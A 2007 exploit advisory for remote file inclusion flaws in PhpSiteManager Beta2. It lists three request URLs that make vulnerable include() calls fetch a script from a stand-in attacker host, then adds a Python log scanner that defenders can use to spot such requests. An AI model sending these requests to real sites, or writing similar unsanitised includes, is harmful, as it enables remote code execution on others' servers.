PhpSiteManager Beta2 suffers from remote file inclusion vulnerabilities.
bdbe4a0975b0c35925386fd9af5ee9ae760f6a457db5ca5a553558c578e5f161
PhpSiteManager-Beta2 Remote File Inclusion Vulnerability
Version Released 2007-05-01
------------------|
Timeline:10:11:07 |
------------------|
Download :
--------------------------------------------------------------------------------------------------------|
http://downloads.sourceforge.net/phpsitemanager/phpSiteManager-Beta2.zip?modtime=1178024627&big_mirror=0|
--------------------------------------------------------------------------------------------------------|
--------|
Exploit |
--------|
----------------------------------------------------------------------------*
/mysql.class.php?filename=http://host.com[evilscript.txt?] *
*
/smarty.class.php?smarty_compile_path=http://host.com/evilscript? *
*
/function.config_load.php?compile_file=http://host.com/evilscript? *
----------------------------------------------------------------------------*
bug:
---
mysql.class.php include($filename)
$filename = $server_root . 'cache/sql_' . $hash . '.php';
bug:
---
Smarty.class.php include($_smarty_compile_path)
bug:
---
function.config_load.php include($_compile_file)
-------|
Author |
-------|
fl0 fl0w
e-mail:flo[underscore]flow[underscore]supremacy@[dot]com
site:http://fl0-fl0w.docspages.com
A renslt.org team member .."we're not the only ones but we're the best"
---|
EOF|
---|
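For defenders, a way to spot requests of the shape listed under "Exploit" in a web server access log. This is an added example, not code from the advisory or from PhpSiteManager. It assumes combined-format log lines; the sample entries, the /psm/ install path and host.example are constructed. It goes slightly beyond the advisory by flagging any URL scheme, not only http://.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameter pairs named in the advisory. Script names are compared
# in lower case because the advisory spells Smarty.class.php both ways.
WATCHED = {
    "mysql.class.php": "filename",
    "smarty.class.php": "smarty_compile_path",
    "function.config_load.php": "compile_file",
}
# Value starts with a URL scheme (http:, ftp:, php:, data:) or with "//".
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)
# Request line of an access log entry. POST bodies are not logged, so only
# parameters carried in the query string can be seen here.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed entries, not taken from a real server
    '203.0.113.5 - - [02/May/2007:10:11:07 +0000] "GET /psm/mysql.class.php?filename=http://host.example/x.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [02/May/2007:10:11:09 +0000] "GET /psm/Smarty.class.php?smarty_compile_path=http%3A%2F%2Fhost.example%2Fx%3F HTTP/1.1" 200 0',
    '198.51.100.7 - - [02/May/2007:10:12:30 +0000] "GET /psm/mysql.class.php?filename=report HTTP/1.1" 200 90',
    '198.51.100.7 - - [02/May/2007:10:12:31 +0000] "GET /psm/index.php?page=http://host.example/ HTTP/1.1" 200 90',
]

def find_rfi_attempts(lines):
    """Return (line_no, script, param, decoded_value) for each suspicious request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue  # not a parsable request line
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue  # not one of the three scripts from the advisory
        # parse_qsl percent-decodes once, as PHP does for $_GET values.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param and REMOTE.match(value):
                hits.append((no, script, param, value))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print("line %d: %s?%s=%s" % hit)
```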